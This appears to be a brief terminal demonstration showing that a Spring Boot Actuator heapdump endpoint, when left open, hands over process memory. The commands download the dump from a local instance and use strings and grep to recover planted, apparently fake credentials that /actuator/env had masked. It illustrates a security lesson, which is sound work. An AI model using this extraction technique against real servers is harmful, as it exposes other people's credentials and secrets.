### profiles: exposeall,open PLUS --management.endpoint.heapdump.access=unrestricted $ curl -s -o /tmp/heap.hprof -w 'status=%{http_code} bytes=%{size_download} type=%{content_type}' http://localhost:8080/actuator/heapdump status=200 bytes=59186852 type=application/octet-stream $ strings /tmp/heap.hprof | grep -c 'S3CRET-partner-credential' 1 $ strings /tmp/heap.hprof | grep -o 'not-a-real-password[^"]*' | head -1 not-a-real-password-but-watch-what-/actuator/env-does-with-it! /actuator/env masked both of these to ******. /actuator/heapdump handed over the process memory that contains them in plaintext. Sanitisation is a property-rendering feature. It is not a security boundary.